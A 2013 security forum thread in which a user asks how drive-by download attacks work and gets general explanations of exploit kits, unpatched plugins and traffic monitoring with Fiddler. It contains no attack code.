Full understanding specific "Drive-by download" behavior

A

ansar313

New Member
Thread author
May 20, 2013
14
0
5
41
Hello to all,
I have little skill in English writing.excuse me :)
I am trying to understand a specific malware behavior that is used by "Drive-by downloads".
specially this questions:
1.What file is downloaded in attack ?
2. What exploit is used to attack ?
3. What domain is redirected and etc
for example in BLADE evaluation lab, some malware URL listed that use Drive-by download.
http://www.blade-defender.org/eval-lab/
i want to understand the exact attack scenario step by step of each url that list in BLADE

Notice: there are many website that make report with full detail but they don't say the mechanism. Please help me!
 
RE: full understanding specific Drive-by download behavior

Here is how a drive-by download and exploit work to infect internet users:

The Blackhole Exploit Kit

iFrame drive-by attack demo
[video=youtube]http://www.youtube.com/watch?&v=_cBed6-ufIQ[/video]
Adobe reader vulnerability demo
 
Last edited:
RE: full understanding specific Drive-by download behavior

dear jack
thanks a lot
but my question is some thing else
is there software or web site that we can give it a malware url and it give us a report that describe attack scenario step by step?
please help me
 
I believe a Drive-By-Download relies on vulnerabilities where the targeted software has an unpatched/open exploit ie. IE6, older Flash Player or Java (plus many other software) and a specially crafted webpage takes advantage of it, and without user interaction.

Other forms, could be using Social Engineering, by tricking the user into downloading files and luring them to executing them (ie. double extension)

However, Modern browsers today will provide Anti-Phishing/Malware Protection and keeping your Plugins updated, help keep your PC secure against the latest attacks.

PS: Correct me if I'm wrong.
 
Files downloaded are first temp files whick likely a legit, then drops others until an executable appeared.

Using a program like Fiddler can monitor its modification om that type attack.
 
You must log in or register to reply here.

You may also like...